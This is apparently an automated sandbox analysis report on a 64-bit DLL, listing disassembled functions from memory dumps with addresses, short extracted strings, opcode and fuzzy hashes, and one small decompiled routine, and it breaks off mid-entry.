Opcode Fuzzy Hash: cdb4b53f2f09b2303a41a9c0704183505d0985f12a48c0c3b60d1fd3dd25ac21
Instruction Fuzzy Hash: 09813C7051474D8BDF98CF28C8896ED3BA0FB48398F565319FD4AA6390CB78D585CB84

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BA24 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

5t%, xrefs: 000000018000BA9E
y, xrefs: 000000018000BC4B

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 5t%$y
API String ID: 0-493594994
Opcode ID: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
Instruction ID: 6792571393c1fc0b2eb6fbc5ae81dec58a59b384453640eb5fb68cdcf9e85be0
Opcode Fuzzy Hash: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
Instruction Fuzzy Hash: AA918BB190078ECFDB58CF68C84A5CE7BB0FB14358F404A19F866962A0D3B4DA65CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800096B8 Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

f<$F, xrefs: 0000000180009875
1e, xrefs: 00000001800096D8

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 1e$f<$F
API String ID: 0-2724976541
Opcode ID: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
Instruction ID: bed1062ba2242fdda31b79b65a0af6ec507006944e588aaef166d9663dde45ee
Opcode Fuzzy Hash: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
Instruction Fuzzy Hash: 1971197010468CABEBBACF68C8997D937A0FB48348F50861DE90D8E290DF749B49DB01

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800084F8 Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

L, xrefs: 00000001800086D6
Y", xrefs: 000000018000860B

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: L$Y"
API String ID: 0-1467774553
Opcode ID: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
Instruction ID: b3e18f2d7fd9a4b9b80f79599815d3f82c5d11737bc9d592f484fdbe236454d7
Opcode Fuzzy Hash: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
Instruction Fuzzy Hash: CB61267151074D9FDB88CF28C8C9AC97BA1FB483A8F55A218FC0A97255C7B4D885CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024680 Relevance: 2.6, Strings: 2, Instructions: 128COMMON

Download Yara Rule

Strings

Sa, xrefs: 00000001800283E3
y&, xrefs: 00000001800246FF

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Sa$y&
API String ID: 0-700414750
Opcode ID: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
Instruction ID: dfee43bf4d265d3107084244710d0931b241e98621e1a28360d7d5c9830a69e6
Opcode Fuzzy Hash: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
Instruction Fuzzy Hash: 6551007061C7848FD7A8DF28C18675BBBF0FBDA704F004A1DE689C7261D77699458B42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028690 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

, N, xrefs: 00000001800287E1
0gL, xrefs: 000000018002880D

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: , N$0gL
API String ID: 0-3996470819
Opcode ID: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
Instruction ID: e6cd01448f2141974011cda714a22c6421916980406a2c47b20c1b92061da8ef
Opcode Fuzzy Hash: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
Instruction Fuzzy Hash: 2551C470500BCCCBEBBACF54CC8D7DA3BA1BB98305F104619D94A9E790DB795648CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800148B0 Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

G`OV, xrefs: 0000000180014A14
1/, xrefs: 000000018001498D

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 1/$G`OV
API String ID: 0-3929948944
Opcode ID: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
Instruction ID: 31e3bcd664d6a8acacbd44d2cd4791fc9ee9cbc125b163ac38e43a9671c391af
Opcode Fuzzy Hash: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
Instruction Fuzzy Hash: E241177050CB848BDBB8DF28D48579AB7E1FB98304F908A1EE88DC7351DB749588CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014FA4 Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

W5, xrefs: 00000001800150D1
2V, xrefs: 00000001800150AE

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 2V$W5
API String ID: 0-1873325321
Opcode ID: 2cac5ebb664ebc0649a93560a62f559e178364f761da87e25be392b8304fa33a
Instruction ID: 63ef17b550405aac1bd81048b7740241b15b08bd30737758e2ae9d54adb6feaa
Opcode Fuzzy Hash: 2cac5ebb664ebc0649a93560a62f559e178364f761da87e25be392b8304fa33a
Instruction Fuzzy Hash: 1741C3B190074A8BDB48DF24C4965DE7FB1FB68398F10421DFC5A9A290D3B8D6A4CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001000 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

ANSk, xrefs: 000000018000109F
oB#x, xrefs: 0000000180001159

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ANSk$oB#x
API String ID: 0-2811520726
Opcode ID: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
Instruction ID: d26c3f383fa39858f36e8a1a25e13c9e437254a393a26a1cbff70abbe494b10c
Opcode Fuzzy Hash: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
Instruction Fuzzy Hash: E141E2B090078E8FDF48CF68C8865DE7BB0FB48358F50461DFC56A6290D3B49664CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002005C Relevance: 2.6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

3, xrefs: 0000000180020119
(B, xrefs: 000000018002015C

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: (B$3
API String ID: 0-3108688774
Opcode ID: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
Instruction ID: 4d52e68c3b5894455c2b855b72f500be9282249362062767deb9202ab9d457a9
Opcode Fuzzy Hash: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
Instruction Fuzzy Hash: 2D41B2706087408BE758DF28C18955BBBF1BBC9744F104A1DFA968B3A0DB75D945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001FA08 Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

\I, xrefs: 000000018001FA24
6`, xrefs: 000000018001FAB8

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 6`$\I
API String ID: 0-4113516648
Opcode ID: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
Instruction ID: 87e2cadb684af144f703d936105f11dfb57f24fa6abc88236f5ea505cb77e2af
Opcode Fuzzy Hash: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
Instruction Fuzzy Hash: 4641F77190070D8BDF48DF68C58A5DD7FB0FB483A8F2A621DE80AB6260D7759585CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009144 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

pr, xrefs: 00000001800091CC
'7, xrefs: 0000000180009152

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: '7$pr
API String ID: 0-1984906187
Opcode ID: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
Instruction ID: a51af08d5e019336a09e0604cbee0951de86a06f6bb7dc6101bcf2cec172da0b
Opcode Fuzzy Hash: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
Instruction Fuzzy Hash: A031C2B05187818BD358CFA8C48A51AFBF5BBC6344F104A1DF9C2866A0D7F5D946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006880 Relevance: 2.6, Strings: 2, Instructions: 80COMMON

Download Yara Rule

Strings

KrTD, xrefs: 000000018000691E
_D, xrefs: 00000001800068FA

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: KrTD$_D
API String ID: 0-934927992
Opcode ID: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
Instruction ID: 79f0e27b47198620a76255f61a383142c91a704a78014043126b857d0cce2a1e
Opcode Fuzzy Hash: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
Instruction Fuzzy Hash: 54316D716187818BD748DF28C05A42ABBE1FB9D30CF444B1DF8CAA6291D7789615CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C498 Relevance: 2.6, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

V, xrefs: 000000018000C4F9
A%9{, xrefs: 000000018000C57D

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: A%9{$V
API String ID: 0-1820082490
Opcode ID: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
Instruction ID: 03f72db5704a5358c6f1172bde4b1415201ccefee93438e503f81867a50f7b44
Opcode Fuzzy Hash: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
Instruction Fuzzy Hash: E941A2B180038E8FDF48DF64D8865CE7FF4FB48348F114619E859AA250D3B8D694CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001A1C Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

>>, xrefs: 0000000180001AD9
(, xrefs: 0000000180001A33

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ($>>
API String ID: 0-1145299130
Opcode ID: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
Instruction ID: 87f9655775df96d3def6b8efa86b2c726d5a06aaa2b0f8cf4872ed89fb5ea4fb
Opcode Fuzzy Hash: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
Instruction Fuzzy Hash: FF31D3B190074E8BDF48CF64C88A1DE7FB0FB58358F24461DE946A6290D3B8D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180027348 Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

f, xrefs: 000000018002739A
bv, xrefs: 0000000180027354

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: bv$f
API String ID: 0-3039744445
Opcode ID: 46d2aa2ebc9209d71c82958834864fb94c0878401221f978366f9a402f9450e9
Instruction ID: 5cd7742688e295825d2d7ad71e75fb66b1b5906d5501222e705b32419eb79afe
Opcode Fuzzy Hash: 46d2aa2ebc9209d71c82958834864fb94c0878401221f978366f9a402f9450e9
Instruction Fuzzy Hash: 0E41B17091438A8FDB49CF68D84A5DE7FF0FB58348F104A29F86AA6250D3B4D664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004CA0 Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

*!#, xrefs: 0000000180004CBA
mV5, xrefs: 0000000180004D66

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: *!#$mV5
API String ID: 0-2993575305
Opcode ID: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
Instruction ID: f4257f88e51e2467cedc4a109958e0d61b2de26f6874c0326167d1c9068f5517
Opcode Fuzzy Hash: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
Instruction Fuzzy Hash: 0931C4B150038E8BDB48CF28C94A5DE7BB0FB58358F014A19FC6696290D7B8D665CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800099EC Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

l^jf, xrefs: 0000000180009A95
`{, xrefs: 0000000180009AD7

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: `{$l^jf
API String ID: 0-1869605660
Opcode ID: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
Instruction ID: eb540d20a08f5e40d8c0ff40e11836e8ded1822f40ca17c0ef14950dbd3fc5a0
Opcode Fuzzy Hash: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
Instruction Fuzzy Hash: D1317FB162D784AFD388DF28D49591ABBE0FB88354F806A1DF8868B290D775D855CB02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001F550 Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

-, xrefs: 000000018001F618
2-, xrefs: 000000018001F560

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 2-$-
API String ID: 0-2034864362
Opcode ID: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
Instruction ID: 4005107032f2b12f9f607655d62483a8781f58ab60f16824121cd48537e79645
Opcode Fuzzy Hash: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
Instruction Fuzzy Hash: CC317FB190078E8FDF48DF68C84A59A7BB0FB18318F414A1AFC6996254D3B4CA64CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000EAC4 Relevance: 2.6, Strings: 2, Instructions: 61COMMON

Download Yara Rule

Strings

q/, xrefs: 000000018000EACC
<&, xrefs: 000000018000EB86

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: <&$q/
API String ID: 0-2233190826
Opcode ID: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
Instruction ID: 34f360e2f025a71cd2e5aa73a3d426e5d18a321659368207a0a8d8f01dd344ad
Opcode Fuzzy Hash: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
Instruction Fuzzy Hash: EE319CB0508B888BE759DF25C48A50BBBF2FBC5788F200A1DF292867A0D775D549CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011664 Relevance: 2.6, Strings: 2, Instructions: 57COMMON

Download Yara Rule

Strings

?P>, xrefs: 00000001800116D2
g%, xrefs: 0000000180011703

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ?P>$g%
API String ID: 0-4203485977
Opcode ID: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
Instruction ID: 717686fd7735f49e019bed61dd90445519292eacbbe0b0eb12e200a6e4bac1a5
Opcode Fuzzy Hash: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
Instruction Fuzzy Hash: 2731B2B090438E8FDB44DF64D88A6DF7BB0FB58348F104A19EC6996250D3B8D664CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800079D8 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

Ts, xrefs: 0000000180007A84
"X,h, xrefs: 0000000180007AA5

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: "X,h$Ts
API String ID: 0-4155455058
Opcode ID: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
Instruction ID: 78e44bf7acd730168ef7454480584198ea74db249acf4ebf7474d583245c3fc9
Opcode Fuzzy Hash: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
Instruction Fuzzy Hash: 7D215DB0529785ABD398DF28D08991EBBE0BBC4308F806A1DF8858A350D7B4D548CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800199E8 Relevance: 2.2, Strings: 1, Instructions: 936COMMON

Download Yara Rule

Strings

Mbqz, xrefs: 000000018001ADD0

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Mbqz
API String ID: 0-2241695783
Opcode ID: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
Instruction ID: 750b1e4ffae553eb56a080148391b3b5c453ff61d810ae7c75f6761a4f8562eb
Opcode Fuzzy Hash: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
Instruction Fuzzy Hash: 6BB23CB552568D8FDBBADF28C8A97D93BE5FB5C304F00422ADC0ACA260E7749755CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6C334 Relevance: 1.6, APIs: 1, Instructions: 150
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00007FFA7FFA0AE6C334(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != sil) goto 0xae6c362;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0xae6c39e;
				return __rdx + 0xb;
			}

0x7ffa0ae6c334
0x7ffa0ae6c339
0x7ffa0ae6c33e
0x7ffa0ae6c362
0x7ffa0ae6c369
0x7ffa0ae6c37c
0x7ffa0ae6c39d

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
Instruction ID: a32a7e2ac208e2cc3e0a79569dcbf225ee511b949e39a1137c0b23b9ff34cc96
Opcode Fuzzy Hash: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
Instruction Fuzzy Hash: 6451F533B086A145FB20AB72F8402AE7BA0FB85BD4F148575EE9C67A95EE3CD001C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A1D4 Relevance: 1.6, Strings: 1, Instructions: 350COMMON

Download Yara Rule

Strings

m1, xrefs: 000000018000A283

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: m1
API String ID: 0-128121454
Opcode ID: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
Instruction ID: 5f51607b613c9aae9948664f2987d724fcb5cf1c05a1f438c657f6daf5c41e3f
Opcode Fuzzy Hash: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
Instruction Fuzzy Hash: 29F11770A04709EFDB58DF68C04A69EBBF2FB48344F40C16DE84AEB290D7759A59CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A734 Relevance: 1.6, Strings: 1, Instructions: 343COMMON

Download Yara Rule

Strings

7s, xrefs: 000000018000AB55

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 7s
API String ID: 0-1359173241
Opcode ID: c3a57ae48d23b59515346257547aa727b2d15ec4c2b1e011d86899241bc59301
Instruction ID: c1bed52c3035b45a669a36fe4e02841f36ae4e7ddeb46aacfe2c23f9d3337973
Opcode Fuzzy Hash: c3a57ae48d23b59515346257547aa727b2d15ec4c2b1e011d86899241bc59301
Instruction Fuzzy Hash: 3B0267B5A0070DCFDB58CF28C59A59D3BA9FB49308F00412DFD0E9A2A4E7B4E915CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010310 Relevance: 1.6, Strings: 1, Instructions: 337COMMON

Download Yara Rule

Strings

0% E, xrefs: 000000018001081C

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 0% E
API String ID: 0-2094739979
Opcode ID: fbf25035978568d4367fdb2795cf05a7893d79d110a623251b08c664a1ec8ff4
Instruction ID: 3cbd3403ae3a5eec6cd9fa22ed9c4212c86eadd61d9582ce71e19d9336bf90de
Opcode Fuzzy Hash: fbf25035978568d4367fdb2795cf05a7893d79d110a623251b08c664a1ec8ff4
Instruction Fuzzy Hash: C8F108B1A0570CCFDBA8DFA8D58A6CDBBF1FF44344F104119E84AA7290D7B8951ACB49

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012244 Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

>, xrefs: 00000001800126FC

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >
API String ID: 0-4048615937
Opcode ID: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
Instruction ID: b0185e3000dff54f49d8606eba530083518bcd1c244eb05af1b54d96feabf3c3
Opcode Fuzzy Hash: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
Instruction Fuzzy Hash: 33D14A715047888BDBF9CF24C88A7D97BE1FB89304F50861DE88ECA291DB749659CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018778 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

w, xrefs: 0000000180018AFF

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: w
API String ID: 0-4210951952
Opcode ID: 450a975b33d67058faa5ef23269fdb7d474cb1b00904f6db6eeb6156179070ce
Instruction ID: 98e286694507409f0343718d484b9c1230728cd38d8ca75ba1cdcc522b4ff82c
Opcode Fuzzy Hash: 450a975b33d67058faa5ef23269fdb7d474cb1b00904f6db6eeb6156179070ce
Instruction Fuzzy Hash: CCD1F27550670DCBEBA9CF28C58A6DE3BE5FF48304F104129FC1A862A1D7B4EA25CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017BF8 Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

k |P, xrefs: 0000000180017C97

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: k |P
API String ID: 0-500141808
Opcode ID: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
Instruction ID: bdb77ffc642b3299673720cbbe7adc6e022f36649dc5c9d605d8e1814f76fd65
Opcode Fuzzy Hash: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
Instruction Fuzzy Hash: 28913B30E0061DDBEF69CFA9E8896DDB7B1FB44344F40822DE416A72A1DB74994ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019230 Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

{?, xrefs: 00000001800194A9

Memory Dump Source

